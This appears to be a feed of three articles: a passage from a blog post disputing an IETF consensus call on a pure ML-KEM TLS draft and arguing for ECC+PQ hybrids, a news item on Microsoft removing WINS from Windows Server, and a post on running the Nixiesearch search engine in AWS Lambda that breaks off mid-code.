  • How does the "area director" end up with 23 positive votes rather than 22? By falsely listing the document author (Deirdre Connolly) as having stated a pro-adoption position during the call. The "area director" seems generally clueless about conflict-of-interest issues and probably doesn't find it obvious that an author shouldn't vote, but the simple fact is that the author didn't vote. She sent three messages during the call period; all of those messages are merely commenting on specific points, not casting a vote on the adoption question.

The document author didn't object to the "area director" fudging the numbers. Bellebaum did politely object ; the "area director" didn't argue , beyond trying to save face with comments such as "Thanks for the clarification".

More to the point, the "area director" has never explained whether or how the tallies of positive and negative votes are supposed to be relevant to the "rough consensus" claim. The "area director" also hasn't commented on IETF saying that IETF doesn't make decisions by voting.

Bogus arguments for the draft. I mentioned in my previous blog post that IETF claims that "IETF participants use their best engineering judgment to find the best solution for the whole Internet, not just the best solution for any particular network, technology, vendor, or user".

In favour argument summary

While there is a lack of substantiating why adoption is desired - which is typical

Okay, the "area director" seems to have some basic awareness that this document flunks the "engineering judgment" criterion. The "area director" tries to defend this by saying that other documents flunk too. So confidence-inspiring!

- the big use case seems to be to support those parties relying on NIST and FIPS for their security requirements.

Wrong. Anything+PQ, and in particular ECC+PQ, complies with NIST's standards when the PQ part does. See NIST SP 800-227 : "This publication approves the use of the key combiner (14) for any t > 1 if at least one shared secret (i.e., S j for some j) is generated from the key-establishment methods in SP 800-56A [1] or SP 800-56B [2] or an approved KEM." For example, if the PQ part is ML-KEM as per FIPS 203, then NIST allows ECC+PQ too.

What's next: claiming that using PQ in an Internet protocol would violate NIST standards unless NIST has standardized that particular Internet protocol?
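For readers unfamiliar with what such a key combiner looks like, here is a minimal sketch (the byte strings, label and choice of SHA-256 are placeholder assumptions, not the exact construction specified by TLS or SP 800-227): both shared secrets feed one key-derivation step, so the derived key stays safe as long as either component does.

import hashlib

ecdh_shared_secret = bytes.fromhex("11" * 32)    # stand-in for an ECDH shared secret
mlkem_shared_secret = bytes.fromhex("22" * 32)   # stand-in for an ML-KEM shared secret

def combine(*secrets, label=b"hybrid-example"):
    # Hash a label plus length-prefixed inputs into one session key.
    h = hashlib.sha256()
    h.update(label)
    for s in secrets:
        h.update(len(s).to_bytes(2, "big"))
        h.update(s)
    return h.digest()

session_key = combine(ecdh_shared_secret, mlkem_shared_secret)
print(session_key.hex())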

This encompasses much more than just the US government as other certification bodies and other national governments have come to rely on the outcome of the NIST competition, which was the only public multi-year post-quantum cryptography effort to evaluate the security of proposed new post-quantum algorithms.

I won't bother addressing the errors here, since the bottom-line claim is orthogonal to the issue at hand. The TLS WG already has an ECC+PQ document using NIST-approved PQ; the question is whether to also have a document allowing the ECC seatbelt to be removed.

It was also argued pure PQ has less complexity.

You know what would be even less complicated? Encrypting with the null cipher!

There was a claim that PQ is less complex than ECC+PQ. There was no response to Andrey Jivsov objecting that having a PQ option makes the ecosystem more complicated. The basic error in the PQ-less-complex claim is that it ignores ECC+PQ already being there.

How the "area director" described the objections.

Opposed argument summary

Most of the arguments against adoption are focused on the fact that a failsafe is better than no failsafe, irrespective of which post-quantum algorithm is used,

This is the closest that the "area director" comes to acknowledging the central security argument for ECC+PQ. Of course, the "area director" spends as little time as possible on security. Compare this to my own objection to adoption, which started with SIKE as a concrete example of the dangers and continued with "SIKE is not an isolated example: https://cr.yp.to/papers.html#qrcsp shows that 48% of the 69 round-1 submissions to the NIST competition have been broken by now".

and that the practical costs for hybrids are negligible.

Hmmm. By listing this as part of an "opposed argument summary", is the "area director" suggesting that this was disputed? When and where was the dispute?

As noted above, I've seen unquantified NSA/GCHQ fearmongering about costs, but that was outside IETF. If NSA and GCHQ tried the same arguments on a public mailing list then they'd end up being faced with questions that they can't answer.

It was also argued that having an RFC gives too much promotion or sense of approval to a not recommended algorithm.

When I wrote my own summary of the objections, I provided a quote and link for each point. The "area director" doesn't do this. If the "area director" is accurately presenting an argument that was raised, why not provide a quote and a link? Is the "area director" misrepresenting the argument? Making up a strawman? The reader can't tell.

I have expanded some of the arguments and my interpretation of the weight of these below.

This comment about "weight" is revealing. What we'll see again and again is that the "area director" is expressing the weight that he places on each argument (within the arguments selected and phrased by the "area director"), i.e., the extent to which he is convinced or not convinced by those arguments.

Given that IESG has power under IETF rules to unilaterally block publications approved by WGs, it's unsurprising that the "area directors", in their roles as IESG members, will end up evaluating the merits of WG-approved documents. But that isn't what this "area director" was instructed to do here. There isn't a WG-approved document at this point. Instead the "area director" was instructed to evaluate whether the chairs "appropriately" called "rough consensus" to "adopt" the document. The "area director" is supposed to be evaluating procedurally what the WG decision-makers did. Instead the "area director" is putting his thumb on the scale in favor of the document.

Incompetent risk management.

Non-hybrid as "basic flaw"

The argument by some opponents that non-hybrids are a "basic flaw" seems to miscategorize what a "basic flaw" is. There is currently no known "basic flaw" against MLKEM.

I think that the "area director" is trying to make some sort of claim here about ML-KEM not having been attacked, but the wording is so unclear as to be unevaluatable. Why doesn't KyberSlash count? How about Clangover ? How about the continuing advances in lattice attacks that have already reduced ML-KEM below its claimed security targets, the most recent news being from last month ?

More importantly, claiming that ML-KEM isn't "known" to have problems is utterly failing to address the point of the ECC seatbelt. It's like saying "This car hasn't crashed, so the absence of seatbelts isn't a basic flaw".

As was raised, it is rather odd to be arguing we must immediately move to use post-quantum algorithms while at the same time argue these might contain fundamental basic flaws.

Here the "area director" is reasonably capturing a statement from one document proponent (original wording: "I find it to be cognitive dissonance to simultaneously argue that the quantum threat requires immediate work, and yet we are also somehow uncertain of if the algorithms are totally broken. Both cannot be true at the same time").

But I promptly followed up explaining the error: "Rolling out PQ is trying to reduce the damage from an attacker having a quantum computer within the security lifetime of the user data. Doing that as ECC+PQ instead of just PQ is trying to reduce the damage in case the PQ part is broken. These actions are compatible, so how exactly do you believe they're contradictory?"

There was, of course, no reply at the time. The "area director" now simply repeats the erroneous argument.

As TLS (or IETF) is not phasing out all non-hybrid classics,

"Non-hybrid classics" is weird terminology. Sometimes pre-quantum algorithms (ECC, RSA, etc.) are called "classical", so I guess the claim here is that using just ECC in TLS isn't being phased out. That's a bizarre claim. There are intensive efforts to roll out ECC+PQ in TLS to try to protect against quantum computers. Cloudflare reports the usage of post-quantum cryptography having risen to about 50% of all browsers that it sees (compared to 20% a year ago); within those connections, 95% use ECC+MLKEM768 and 5% use ECC+Kyber768.

The "area director" also gives no explanation of why the "not phasing out" claim is supposed to be relevant here.

I find this argument not strong enough

See how the "area director" is saying the weight that the "area director" places on each argument (within the arguments selected and phrased by the "area director"), rather than evaluating whether there was consensus to adopt the document?

to override the consensus of allowing non-hybrid standards from being defined

Circular argument. There wasn't consensus to adopt the document in the first place.

especially in light of the strong consensus for marking these as "not recommended".

I think many readers will be baffled by this comment. If something is "not recommended", wouldn't that be an argument against standardizing it, rather than an argument for standardizing it?

The answer is that "not recommended" doesn't mean what you think it means: the "area director" is resorting to confusing jargon. I don't think there's any point getting into the weeds on this.

Incompetent planning for the future.

Non-hybrids are a future end goal

Additionally, since if/when we do end up in an era with a CRQC, we are ultimately designing for a world where the classic components offer less to no value.

If someone is trying to argue for removing ECC, there's a big difference between the plausible scenario of ECC having "less" value and the extreme scenario of ECC having "no" value. It's wrong for the "area director" to be conflating these possibilities.

As I put it almost two years ago: "Concretely, think about a demo showing that spending a billion dollars on quantum computation can break a thousand X25519 keys. Yikes! We should be aiming for much higher security than that! We don't even want a billion-dollar attack to be able to break one key! Users who care about the security of their data will be happy that we deployed post-quantum cryptography. But are the users going to say 'Let's turn off X25519 and make each session a million dollars cheaper to attack'? I'm skeptical. I think users will need to see much cheaper attacks before agreeing that X25519 has negligible security value."

Furthermore, let's think for a moment about the idea that one will eventually want to transition to just ML-KEM, the specific proposal that the "area director" is portraying as the future. Here are three ways that this can easily be wrong:

  • Maybe ML-KEM's implementation issues end up convincing the community to shift to a more robust option, analogously to what happened with ECC.

  • Maybe the advances in public attacks continue to the point of breaking ML-KEM outright.

  • Maybe the cliff stops crumbling and ML-KEM survives, but more efficient options also survive. At this point there are quite a few options more efficient than ML-KEM. (Random example: SMAUG. The current SMAUG software isn't as fast as the ML-KEM software, but this is outweighed by SMAUG using less network traffic than ML-KEM.) Probably some options will be broken, but ML-KEM would have to be remarkably lucky to end up as the most efficient remaining option.

Does this "area director" think that all of the more efficient options are going to be broken, while ML-KEM won't? Sounds absurdly overconfident. More likely is that the "area director" doesn't even realize that there are more efficient options. For anyone thinking "presumably those newer options have received less scrutiny than ML-KEM": we're talking about what to do long-term, remember?

Taking ML-KEM as the PQ component of ECC+PQ is working for getting something rolled out now. Hopefully ML-KEM will turn out to not be a security disaster (or a patent disaster). But, for guessing what will be best to do in 5 or 10 or 15 years, picking ML-KEM is premature.

When and where to exactly draw the line of still using a classic component safeguard is speculation at best.

Here the "area director" is clearly attacking a strawman.

Already supporting pure post quantum algorithms now to gain experience

How is rolling out PQ supposed to be gaining experience that isn't gained from the current rollout of ECC+PQ?

Also, I think it's important to call out the word "pure" here as incoherent, indefensible marketing. What we're actually talking about isn't modifying ML-KEM in any way; it's simply hashing the ML-KEM session key together with other inputs. Is ML-KEM no longer "pure" when it's plugged into TLS, which also hashes session keys? (The word "pure" also showed up in a few of the earlier quotes.)

while not recommending it at this time seems a valid strategy for the future, allowing people and organizations their own timeline of deciding when/if to go from hybrid to pure PQ.

Here we again see the area director making a decision to support the document, rather than evaluating whether there was consensus in the WG to adopt the document.

Again getting the complexity evaluation backwards.

Added complexity of hybrids

There was some discussion on whether or not hybrids add more complexity, and thus add risk, compared to non-hybrids. While arguments were made that proper classic algorithms add only a trivial amount of extra resources, it was also pointed out that there is a cost of implementation, deployment and maintenance.

Here the "area director" is again making the same mistake explained earlier: ignoring the fact that ECC+PQ is already there, and thus getting the complexity evaluation backwards.

The "thus add risk" logic is also wrong. Again, all of these options are more complex than the null cipher.

Additionally, the existence of draft-ietf-tls-hybrid-design and the extensive discussions around "chempat" vs "xwing" vs "kitchensink" shows that there is at least some complexity that is added by the hybrid solutions.

No, the details of how to combine ECC with PQ in TLS are already settled and deployed.

Looking beyond TLS: Chempat hashes the transcript (similarly to TLS), making it robust for a wide range of protocols. The other options add fragility by hashing less for the sake of minor cost savings. Each of these options is under 10 lines of code. The "area director" exaggerates the complexity by mentioning "extensive discussions", and spends much more effort hyping this complexity as a risk than acknowledging the risks of further PQ attacks.
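
To make "under 10 lines of code" concrete, here is a minimal sketch of a transcript-hashing combiner in Python. It is purely illustrative (the label string and names are mine, and this is not the Chempat, X-Wing, or TLS specification); the point is only the order of magnitude of the complexity being debated:

import hashlib

def combine(ecdh_ss, mlkem_ss, transcript):
    # Hash both shared secrets together with the transcript
    # (public keys and ciphertexts), so the output stays secret
    # as long as either component is unbroken.
    h = hashlib.sha3_256()
    h.update(b"demo-hybrid-combiner")  # domain-separation label (made up)
    h.update(ecdh_ss)
    h.update(mlkem_ss)
    h.update(transcript)
    return h.digest()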

Anyway, it's not as if the presence of this document has eliminated the discussions of ECC+PQ details, nor is there any credible mechanism by which it could do so. Again, the actual choice at hand is whether to have PQ as an option alongside ECC+PQ. Adding that option adds complexity. The "area director" is getting the complexity comparison backwards by instead comparing (1) PQ in isolation to (2) ECC+PQ in isolation.

Botching the evaluation of human factors.

RFCs being interpreted as IETF recommendation

It seems there is disagreement about whether the existence of an RFC itself qualifies as the IETF defacto "recommending" this in the view of IETF outsiders/ implemeners whom do not take into account any IANA registry RECOMMENDED setting or the Mandatory-To-Implement (MTI) reommendations.

I would expect a purchasing manager to have instructions along the lines of "Buy only products complying with the standards", and to never see IETF's confusing jumble of further designations.

This is an area where we recently found out there is little consensus on an IETF wide crypto policy statement via an RFC. The decision on whether an RFC adds value to a Code Point should therefor be taken independently of any such notion of how outsiders might interpret the existence of an RFC.

From a security perspective, it's a big mistake to ignore the human factor, such as the impact of a purchasing manager saying "This is the most efficient standard so I'll pick that".

In this case, while Section 3 could be considered informative, I believe Section 4 and Section 5 are useful (normative) content that assists implementers.

Is this supposed to have something to do with the consensus question?

And people have proposed extending the Security Considerations to more clearly state that this algorithm is not recommended at this point in time. Without an RFC, these recommendations cannot be published by the IETF in a way that implementers would be known to consume.

Ah, yes, "known to consume"! There was, um, one of those, uh, studies showing the details of, um, how implementors use RFCs, which, uh, showed that 100% of the implementors diligently consumed the warnings in the RFCs. Yeah, that's the ticket. I'm sure the URL for this study is sitting around here somewhere.

Let's get back to the real world. Even if an implementor does see a "This document is a bad idea" warning, this simply doesn't matter when the implementors are chasing contracts issued by purchasing managers who simply care what's standardized and haven't seen the warning.

It's much smarter for the document to (1) eliminate making the proposal that it's warning about and (2) focus, starting in the title, on saying why such proposals are bad. This makes people more likely to see the warning, and at the same time it removes the core problem of the bad proposal being standardized.

Fictions regarding country actions.

Say no to Nation State algorithms

The history and birth of MLKEM from Kyber through a competition of the international Cryptographic Community, organized through US NIST can hardly be called or compared to unilateral dictated nation state algorithm selection.

NIST repeatedly refused to designate the "NIST Post-Quantum Cryptography Standardization Process" as a "competition". It even wrote that the process "should not be treated as a competition".

Certainly there were competition-like aspects to the process. I tend to refer to it as a competition. But in the end the selection of algorithms to standardize was made by NIST, with input behind the scenes from NSA.

There has been no other comparable public effort to gather cryptographers and publicly discuss post-quantum crypto candidates in a multi-years effort.

Nonsense. The premier multi-year effort by cryptographers to "publicly discuss post-quantum crypto candidates" is the cryptographic literature.

In fact, other nation states are heavily relying on the results produced by this competition.

Here's the objection from Stephen Farrell that the "area director" isn't quoting or linking to: "I don't see what criteria we might use in adopting this that wouldn't leave the WG open to accusations of favouritism if we don't adopt other pure PQ national standards that will certainly arise".

After reading this objection, you can see how the "area director" is sort of responding to it by suggesting that everybody is following NIST (i.e., that the "certainly arise" part is wrong).

But that's not true. NIST's selections are controversial. For example, ISO is considering not just ML-KEM but also

  • Classic McEliece, where NIST has said it's waiting for ISO ("After the ISO standardization process has been completed, NIST may consider developing a standard for Classic McEliece based on the ISO standard"), and

  • FrodoKEM, which NIST said "will not be considered further for standardization".

ISO is also now considering NTRU, where the advertisement includes "All patents related to NTRU have expired" (very different from the ML-KEM situation).

BSI, which sets cryptographic standards for Germany, recommends not just ML-KEM but also FrodoKEM (which it describes as "more conservative" than ML-KEM) and Classic McEliece ("conservative and very thoroughly analysed"). Meanwhile China has called for submissions of new post-quantum proposals for standardization.

I could keep going, but this is enough evidence to show that Farrell's prediction was correct; the "area director" is once again wrong.

The use of MLKEM in the IETF will not set a precedent for having to accept other nation state cryptography.

Notice how the "area director" is dodging Farrell's point. If NSA can pressure the TLS WG into standardizing non-hybrid ML-KEM, why can't China pressure the TLS WG into standardizing something China wants? What criteria will IETF use to answer this question without leaving the WG "open to accusations of favouritism"? If you want people to believe that it isn't about the money then you need a really convincing alternative story.

Denouement.

Not recommending pure PQ right now

There was a strong consensus that pure PQ should not be recommended at this time, which is reflected in the document. There was some discussion on RECOMMENDED N vs D, which is something that can be discussed in the WG during the document's lifecycle before WGLC. It was further argued that adopting and publishing this document gives the WG control over the accompanying warning text, such as Security Considerations, that can reflect the current consensus of not recommending pure MLKEM over hybrid at publication time.

This is just rehashing earlier text, even if the detailed wording is a bit different.

Conclusion


The pure MLKEM code points exist.

Irrelevant. The question is whether they're being standardized.

An international market segment that wants to use pure MLKEM exists

"International"? Like Swedish company Ericsson setting up its "Ericsson Federal Technologies Group" in 2024 to receive U.S. military contracts?

as can be seen by the consensus call outcome

Um, how?

along with existing implementations of the draft on mainstream devices and software.

Yes, NSA waving around money has convinced some corporations to provide software. How is this supposed to justify the claim that "there was rough consensus to adopt the document"?

There is a rough consensus to adopt the document

Repeating a claim doesn't make it true.

with a strong consensus for RECOMMENDED N and not MTI, which is reflected in the draft.

Irrelevant. What matters is whether the document is standardized.

The reasons to not publish MLKEM as an RFC seem more based on personal opinions of risk and trust not shared amongst all participants as facts.

This sort of dismissal might be more convincing if it were coming from someone providing more URLs and fewer easily debunked claims. But it's in any case not addressing the consensus question.

Based on the above, I believe the WG Chairs made the correct call that there was rough consensus for adopting draft-connolly-tls-mlkem-key-agreement

The chairs claimed that "we have consensus to adopt this draft" (based on claiming that "there were enough people willing to review the draft", never mind the number of objections). That claim is wrong. The call for adoption failed to reach consensus.

The "area director" claimed that "There is clearly consensus based on the 67 responses to the adoption call. ... The vast majority was in favour of adoption ... There were a few dissenting opinions". These statements still haven't been retracted; they were and are outright lies about what happened. Again, the actual tallies were 20 people unequivocally supporting adoption, 2 people conditionally supporting adoption, and 7 people unequivocally opposing adoption.

Without admitting error, the "area director" has retreated to a claim of "rough consensus". The mishmash of ad-hoc comments from the "area director" certainly doesn't demonstrate any coherent meaning of "rough consensus".

It's fascinating that IETF's advertising to the public claims that IETF's "decision-making requires achieving broad consensus", but IETF's WG procedures allow controversial documents to be pushed through on the basis of "rough consensus". To be clear, that's only if the "area director" approves of the documents, as you can see from the same "area director" issuing yet another mishmash of ad-hoc comments to overturn a separate chair decision in September 2025.

You would think that the WG procedures would define "rough consensus". They don't. All they say is that "51% of the working group does not qualify as 'rough consensus' and 99% is better than rough", not even making clear whether 51% of voters within a larger working group can qualify. This leaves a vast range of ambiguous intermediate cases up to the people in power.


Version: This is version 2025.11.23 of the 20251123-dodging.html web page.

Microsoft to remove WINS support after Windows Server 2025

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 11:47:01
Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034. [...]...
Original Article


Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034.

The legacy WINS computer name registration and resolution service has been deprecated with the release of Windows Server 2022 in August 2021, when Microsoft stopped active development and work on new features.

Windows Server 2025 will be the final Long-Term Servicing Channel release to come with WINS support, with the feature to be removed from future releases.


"WINS was officially deprecated since Windows Server 2022 and will be removed from all Windows Server releases following Windows Server 2025," Microsoft announced on Friday.

"Standard support will continue through the lifecycle of Windows Server 2025, until November 2034. We encourage you to migrate to modern Domain Name System (DNS)-based name resolution solutions before then."

Once removal takes effect, Windows Server will no longer include the WINS server role, the WINS management console snap-in, the WINS automation APIs, and related interfaces.

Microsoft highlighted several reasons for eliminating WINS support, including DNS's superior scalability and compliance with modern internet standards, and it noted that DNSSEC provides security protections against cache poisoning and spoofing attacks that WINS/NetBIOS cannot mitigate.

It also added that modern Microsoft services, including Active Directory, cloud platforms, and Windows APIs, rely on DNS for name resolution.

Organizations still dependent on WINS are advised to immediately begin auditing services and applications that still rely on NetBIOS name resolution and migrate to DNS with conditional forwarders, split-brain DNS, or search suffix lists to replace WINS functionality.

Microsoft also cautioned against temporary workarounds such as static host files, saying they don't scale and aren't sustainable for enterprise environments.

"Now is the time to review dependencies, evaluate DNS migration plans, and make informed decisions," Microsoft noted.

"Organizations relying on WINS for NetBIOS name resolution are strongly encouraged to begin migration planning immediately to avoid disruptions."


I put a search engine into a Lambda, so you only pay when you search

Lobsters
nixiesearch.substack.com
2025-11-24 11:44:46
Comments...
Original Article

Modern serverless search is just an accounting trick. There’s a hidden pool of nodes behind the API, and the final bill is split evenly among all clients. There’s always a standby warm node waiting for your request - you just don’t see it.

And you can’t get rid of it because scaling search engines is HARD (or at least search vendors want you to think so). You can’t just put one into a Lambda function. But what if you actually can?

As someone who has hated Elasticsearch since version 0.89 (but still uses it), there are three major blockers to running it in a truly serverless mode:

  • Container size : It’s around 700MB in version 9.x. The bigger the container, the slower the node startup, since it has to be pulled from somewhere.

  • Container startup time : For ES 9.x, the startup time alone is about 40 seconds. And the time-to-performance is much worse, since a cold JVM is painfully slow until it sees some traffic.

  • Index and state : Search engines like Elastic and Qdrant behave like databases, with each node hosting a fraction of the total cluster state. When a new node joins, the cluster needs to rebalance. What happens if you scale-to-zero? Better not ask.

We’re going to take my pet-project-gone-big search engine, Nixiesearch, and squeeze it into an AWS Lambda:

  • It’s also JVM-based, since it uses Apache Lucene for all search-related internals (like OpenSearch, Elasticsearch and SOLR). We’re going to build a native x86_64 binary with GraalVM native-image: this should reduce the Docker image size (no JVM!) and eliminate JVM warmup entirely.

  • Can we store an index outside the search engine? Can we achieve reasonable latency with AWS S3? What if we host the index on AWS EFS instead?

You may wonder why we would ever need to perform weird AWS Lambda tricks when we can just keep the status quo with warm stand-by nodes. No warm-up, no cold start, no obscure limits - it’s a good traditional approach.

Because doing weird stupid things is the way I learn. So the challenge is to have a proof-of-concept which:

  • Has minimal startup time, so scaling up and down won’t be an issue. With sub-second startup you can even scale to zero when there’s no traffic!

  • Search latency is going to be reasonably fast. Yes, modern search engines compete on 3 vs 5 milliseconds, but in practice you also have a chonky embedding model, which adds an extra 300-400ms of latency on top.

Java AOT compilation and remote index storage, sounds easy.

GraalVM native-image is an Ahead-Of-Time compiler: it takes a JVM application JAR file and builds an almost zero-dependency native binary that depends only on glibc. It sounds fancy in theory, but in practice not all applications can be statically compiled that easily.

Accessing a field reflectively in Java. If you do this, you are probably doing something wrong.

If you (or your transitive dependencies) use reflection to do something dynamic like enumerating class fields or loading classes dynamically, then GraalVM requires you to create a reflect-config.json file listing all the nasty things you do.

Example of reflect-config.json

Building such a file manually for all transitive dependencies is practically impossible. But in modern GraalVM versions you can attach a tracing agent to your application, which records all the nasty things happening throughout the entire codebase.

java -agentlib:native-image-agent -jar nixiesearch.jar standalone

The tracing agent needs to observe all execution paths in your application, and instead of sending all possible search requests manually, I just attached it to the test suite — and got a monumental reachability-metadata.json file that hopefully covers all reflection usage in transitive dependencies.

It’s time to build our first native binary!

A real native-image command-line.

It takes around two minutes on my 16-core AMD Zen 5 CPU to compile the binary, which is impressively slow. With an ubuntu:24.04 minimal base image we get 338MB — a nice reduction from 760MB.

But can we get rid of the 90MB base Ubuntu image and go with Alpine? Yes, but it requires building Nixiesearch with musl instead of glibc. Luckily, as the build is dockerized, you can replace ghcr.io/graalvm/native-image-community:25 with ghcr.io/graalvm/native-image-community:25-muslib and get a nice musl-based build env.

native-image --libc=musl -jar nixiesearch.jar <options>

The musl-based binary ends up at the same 244MB, but now it can run natively on Alpine without the gcompat glibc layer. But can we go even further and build the app completely statically, without linking libc at all? Once you start trimming dependencies, it’s hard to stop.

native-image --static --libc=musl -jar nixiesearch.jar <options>

Now we’re at 248MB, but we no longer need a base system at all - which gives us the most perfect Docker image ever:

FROM scratch
COPY --from=builder /build/nixiesearch /nixiesearch
ENTRYPOINT ["/nixiesearch"]

We could go even further and enable the -Os option to optimize for size, but I’m afraid it might impact request processing performance.

How I went from 760MB docker image to just 205MB.

GraalVM also notes that almost 30% of the codebase is taken up by the AWS Java SDK with its massive dependency footprint, so the next step is switching to the raw S3 REST API instead of the nice SDK helpers.

I originally thought that the AWS Lambda runtime for Docker is just a simple “docker pull” and “docker run” on each request, but it’s slightly more complex:

Lambda API request lifecycle.
  1. On initial code deployment, the container gets fetched from ECR, unpacked and cached in all AWS AZs where your lambda is scheduled to run.

  2. When the first request arrives, the container goes into the Init stage: it gets executed on a minimal Firecracker VM. The Lambda runtime waits until the started container polls the runtime API for the actual request to process. This stage is billed, so we need to be as fast as possible here.

  3. Request stage: the container polls the runtime API for a request and produces the response. This is where the actual work happens, and this is the part you’re also billed for.

  4. And here comes the MAGICAL Freeze stage: after the Lambda API receives a response and sees that the app starts polling for the next request, the VM gets frozen. It’s still a VM, but with zero CPU and its RAM offloaded to disk. You pay zero for a container in the freeze stage.

  5. When a new request arrives, the container VM enters the Thaw stage: it gets unfrozen, processes the next request, and so on until it gets frozen again.

  6. When no requests arrive for a longer period of time (in practice 5-15 minutes), the lambda container gets destroyed.

Cold request (full init):

  Duration: 84.15 ms
  Billed Duration: 535 ms
  Memory Size: 3008 MB
  Max Memory Used: 133 MB
  Init Duration: 449.85 ms	

Warm request (after freeze-thaw cycle):

  Duration: 2.62 ms
  Billed Duration: 3 ms
  Memory Size: 3008 MB
  Max Memory Used: 194 MB	

That’s nice: we were able to spin up the cold container in only 449ms, and warm no-op requests are just 3ms!
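
As a mental model of where those stages fall, here is a minimal Python handler sketch (placeholder names, not Nixiesearch code): everything at module scope runs once during the billed Init stage and survives freeze/thaw cycles, while the handler body runs, and is billed, per request.

import time

# Module scope: runs once, during the Init stage; whatever we build
# here survives freeze/thaw cycles until the VM is destroyed.
COLD_START = time.time()
INDEX = {"hello": "world"}  # placeholder for "open the index once"

def handler(event, context):
    # Handler body: runs per request (the Request stage); between
    # invocations the VM is frozen and costs nothing.
    query = event.get("query", "")
    return {
        "statusCode": 200,
        "body": f"query={query!r}, warm for {time.time() - COLD_START:.1f}s",
    }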

But note that AWS Lambda compute is very limited:

  • RAM: 128MB default with up to 3008MB max. You can submit a support ticket to get 10GB RAM, but I was too lazy to argue with AWS support.

  • vCPU: 1 vCPU, and if you go beyond 1536MB of RAM, you get a second vCPU. Not much.

  • Disk: up to 10GB of instance storage.

And last but not least, S3 read throughput depends on RAM size:

The S3 throughput data is well aligned with the known S3 throughput limits for AWS EC2 instances. Assuming that we have only 2 vCPUs max, 100MB/s is the best you can expect - which is not nice, considering that to run a search we need to access the index.

Nixiesearch was always built with S3 block storage in mind. But like OpenSearch (and perhaps Elasticsearch Serverless), it uses S3 only for simple segment replication:

Segment replication with AWS S3.

As lambdas are ephemeral, we need to somehow deliver the index to the search engine:

  • We can directly wrap all Lucene index access into S3 GetObject calls. This might work, but HNSW vector search is an iterative graph traversal, which will ruin the latency. Slow (and expensive due to ~500 S3 reads per request) search, but no init time. But it sounds serverless!

  • We can do a good old segment replication from S3 to Lambda ephemeral storage. Then for a 2GB index and an expected 100MB/s throughput our init time is going to be 2GB / 0.1GB/s = 20 seconds. But after that the search speed is going to be perfect with no extra costs.

Napkin math for storage costs at 1M requests (redone as a short script below):

  • Direct S3 search with no caching: 500 S3 reads per request * 1M requests * $0.0004/1000 reads = $200/month. Yes, running an ES cluster is more expensive, but not by much.

  • Segment replication: considering that 1M requests/month is around 0.5rps, your lambda function is going to be always warm and there are no repeated inits - you fetch the index once and only refresh changed segments. Then the cost is going to be around $0.

I don’t like the idea of an init taking half a minute - then we’re not much different from good old Elastic. But what if we host the index on NFS (e.g. AWS EFS) storage?

  • AWS EFS: 1MB of data read per search request * 1M requests * $0.03/GB = $30/month. Now the math makes more sense: we have zero init time, but extra latency on every disk access.
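
The same napkin math as a throwaway Python script, using the per-unit prices quoted above (treat them as this post's assumptions, not as current AWS pricing):

requests_per_month = 1_000_000

# Option 1: search directly against S3, ~500 GetObject calls per request.
s3_reads = 500 * requests_per_month
s3_cost = s3_reads / 1000 * 0.0004           # $0.0004 per 1000 reads
print(f"direct S3: ${s3_cost:.0f}/month")    # -> $200/month

# Option 2: segment replication to ephemeral storage; the lambda stays
# warm at this request rate, so the index is fetched once: ~$0/month.

# Option 3: index on EFS, ~1MB read per search request.
efs_gb_read = 1 * requests_per_month / 1000  # 1MB * 1M requests ~= 1000GB
efs_cost = efs_gb_read * 0.03                # $0.03 per GB read
print(f"EFS: ${efs_cost:.0f}/month")         # -> $30/month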

I took the FineWiki “simple” part with 300k documents, embedded them with OpenAI text-embedding-3-small model and deployed it on an AWS Lambda with EFS storage attached.

Nixiesearch can do ONNX embedding inference for sentence-transformers models locally, but considering the average embedding model size (1-2GB) and the amount of RAM/vCPU we have, it might not be a good idea.

To have a fully-functional tech demo, I vibe-coded (oh no) a simple web front-end on GH pages: https://nixiesearch.github.io/lambda-demo-ui/

Blue gradient background is like an em-dash of vibe-coded front-ends.

There’s a nice server+client-side latency breakdown if you want to see where the actual time is spent. And yes, 1.5s first-request latency is kinda slower than I initially expected.

In simple words, random reads from NFS-style storage are just slow:

breakdown of a sample request

As my test lambda runs in AWS us-east-1 and I’m physically in the EU, latency can be improved by replicating the lambda to more regions. Embedding latency is the AI toll we have to pay anyway. But why are the search and fetch stages so slow?

Because both HNSW search and document fetch are a bunch of iterative random reads, and with per-read AWS EFS latency being around 1ms, that’s what we get.

One of the reviewers of this post suggested baking the whole index directly into the Docker image as an alternative: yes, you cannot easily update the index in real time anymore - you need to rebuild the Docker image from scratch every time it changes. But it may work in cases where you can tolerate some lag in indexing. And the results we got were even more surprising:

Just when you thought AWS EFS was slow, try baking the index into the docker image.

I thought 1.5s request latency with AWS EFS was slow, but random reads across an index baked directly into the Docker image were even slower. Why? Because lambdas don’t run docker images as-is: they unpack them and cache them in an AZ-local S3 block cache:

In other words, baking the index into a docker image is just another way of storing your index in an AZ-local S3 Express bucket (and mounting it with s3-fuse or something).

Realistically 1.5s (and even 7s) per cold search might sound horrible, but things get fast pretty quickly as we eventually load cold data into a filesystem cache:

The image above is for the Docker-bundled index, but for EFS/NFS-attached storage it’s quite similar.

We get to a reasonable 120ms search latency and almost instant field fetches around request #10. But it’s still far from the idealistic idea of true serverless search, where you don’t need an idling warm node up to serve your request.

Folks like turbopuffer, topk and LanceDB advocate the idea that to run on top of S3 you need another, non-HNSW data structure like IVF, which is more friendly to high access latency.

Instead of navigating over the HNSW graph, iteratively doing a ton of random reads, you can just cluster documents together and only perform batch reads of the clusters lying near your query (a rough sketch follows this list):

  • Much easier search implementation without any iterative random read patterns: just read a cluster’s complete set of documents in a single S3 GetObject request.

  • Clusters can be updated in-place by just appending new documents.

  • The elephant in the room: IVF has much, much worse recall, especially for filtered search. So your search can be either fast or precise; you have to choose in advance.
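
For illustration, here is a toy IVF-style sketch in pure numpy (the naming and the toy k-means are mine; real systems add quantization, re-ranking and filtering, and read each probed cluster from S3 in one batched request rather than from memory):

import numpy as np

def build_ivf(vectors, n_clusters=16, iters=10):
    # Toy k-means: assign every document vector to its nearest centroid.
    vectors = np.asarray(vectors, dtype=np.float32)
    rng = np.random.default_rng(0)
    centroids = vectors[rng.choice(len(vectors), n_clusters, replace=False)]
    for _ in range(iters):
        dists = np.linalg.norm(vectors[:, None, :] - centroids[None, :, :], axis=2)
        assign = dists.argmin(axis=1)
        for c in range(n_clusters):
            if np.any(assign == c):
                centroids[c] = vectors[assign == c].mean(axis=0)
    return centroids, assign

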